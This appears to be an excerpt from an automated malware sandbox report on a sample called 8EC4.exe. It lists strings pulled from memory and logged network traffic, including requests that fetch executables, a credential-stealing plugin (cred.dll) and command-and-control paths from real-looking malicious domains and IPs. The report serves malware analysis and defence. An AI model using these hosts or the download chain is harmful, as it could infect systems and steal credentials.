                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: svchost.exe, 0000001D.00000003.794726448.00000188AC382000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794353664.00000188AC371000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794332789.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795192720.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795091676.00000188AC3A3000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                          Source: 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabt
                          Source: 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: https://get.adob
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                          Source: 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                          Source: 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                          Source: svchost.exe, 0000001D.00000003.794726448.00000188AC382000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794353664.00000188AC371000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794332789.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795192720.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795091676.00000188AC3A3000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                          Source: svchost.exe, 0000001D.00000003.794726448.00000188AC382000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794353664.00000188AC371000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.794332789.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795192720.00000188AC360000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.795091676.00000188AC3A3000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                          Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1005269358.0000000002CD8000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1002161334.0000000002CC2000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.976992957.0000000002C00000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: svchost.exe, 0000001D.00000003.800561405.00000188AC37D000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.800577498.00000188AC38E000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.800720160.00000188AC3AF000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                          Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                          Source: C:\Users\user\AppData\Local\Temp\7CA1.exeCode function: 20_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,HeapCreate,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                          Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
                          Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                          Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1Host: 185.215.113.35
                          Source: global trafficHTTP traffic detected: GET /3.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                          Source: global trafficHTTP traffic detected: GET /45512.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/870316542b6e8d6795384509412b3780ad4b1d32 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /advert.msi HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /File.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /123.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /442.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /512412.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET /443.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: global trafficHTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/aaef434f5519a28dfcee0c61d66234f26ec46162 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /RM.exe HTTP/1.1Host: a0621298.xsph.ruAccept: */*
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 19 b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
